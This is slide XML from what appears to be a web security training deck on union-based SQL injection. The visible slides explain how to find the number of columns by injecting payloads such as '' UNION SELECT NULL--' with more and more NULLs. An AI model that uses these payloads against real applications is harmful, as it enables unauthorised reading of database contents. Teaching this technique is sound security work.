                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>range	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>number	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>items	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="515">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>list.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1266380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80"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-235"/>
              <a:t>Union-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-850"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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4752" y="2931714"/>
            <a:ext cx="17197705" cy="135763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755"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Determining </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>number </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>columns </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>required </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-815">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-340">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-335" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-459" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-280" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="4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89514" y="4626833"/>
            <a:ext cx="16341090" cy="39370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7940" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="220"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1459865" algn="l"/>
                <a:tab pos="2468245" algn="l"/>
                <a:tab pos="3188335" algn="l"/>
                <a:tab pos="3908425" algn="l"/>
                <a:tab pos="5060315" algn="l"/>
                <a:tab pos="5924550" algn="l"/>
                <a:tab pos="6356985" algn="l"/>
                <a:tab pos="6788784" algn="l"/>
                <a:tab pos="7653020" algn="l"/>
                <a:tab pos="8660765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>title,	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cost	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>product	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>where	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>id	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=1	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>NULL--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2205" y="5348812"/>
            <a:ext cx="15046325" cy="109347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389255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="3960"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389255" algn="l"/>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Incrementally </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>inject </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-285">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>series </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-630">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>specifying </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-285">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-480">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>different  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>until</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>no</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>longer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3700" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:endParaRPr sz="3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9514" y="6864021"/>
            <a:ext cx="16341090" cy="39370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7305" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="739775" algn="l"/>
                <a:tab pos="1604010" algn="l"/>
                <a:tab pos="2612390" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="740">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>NULL--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9514" y="7743576"/>
            <a:ext cx="16341090" cy="7105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6034" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="452120" marR="326390">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="204"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1028065" algn="l"/>
                <a:tab pos="1316355" algn="l"/>
                <a:tab pos="2179955" algn="l"/>
                <a:tab pos="2324100" algn="l"/>
                <a:tab pos="3476625" algn="l"/>
                <a:tab pos="4340225" algn="l"/>
                <a:tab pos="4628515" algn="l"/>
                <a:tab pos="5636895" algn="l"/>
                <a:tab pos="7077075" algn="l"/>
                <a:tab pos="7508875" algn="l"/>
                <a:tab pos="8517255" algn="l"/>
                <a:tab pos="9813290" algn="l"/>
                <a:tab pos="10533380" algn="l"/>
                <a:tab pos="11253470" algn="l"/>
                <a:tab pos="11685270" algn="l"/>
                <a:tab pos="12549505" algn="l"/>
                <a:tab pos="13557885" algn="l"/>
                <a:tab pos="13989685" algn="l"/>
                <a:tab pos="15718155" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="370">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>All</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="370">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>queries</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>combined</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>INTERSECT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-235">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>EXCEPT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-235">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>operator</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>equal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>expressions</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="285">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="335">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>their	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>target		</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="445">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lists.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9514" y="8940324"/>
            <a:ext cx="16341090" cy="7105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9209" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="739775" indent="-288290">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="229"/>
              </a:spcBef>
              <a:buChar char="'"/>
              <a:tabLst>
                <a:tab pos="739775" algn="l"/>
                <a:tab pos="740410" algn="l"/>
                <a:tab pos="1604010" algn="l"/>
                <a:tab pos="2612390" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>NULL--</a:t>
            </a:r>
            <a:endParaRPr sz="2050">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="739775" indent="-288290">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buChar char="'"/>
              <a:tabLst>
                <a:tab pos="739775" algn="l"/>
                <a:tab pos="740410" algn="l"/>
                <a:tab pos="1604010" algn="l"/>
                <a:tab pos="2612390" algn="l"/>
                <a:tab pos="3476625" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UNION	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SELECT	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>NULL,	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2050" spc="30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>NULL--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1266380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80"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-235"/>
              <a:t>Union-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-850"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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4763" y="2861575"/>
            <a:ext cx="16290290" cy="186245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4250" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Finding </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>columns </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-310">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>useful </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>type </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4250" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
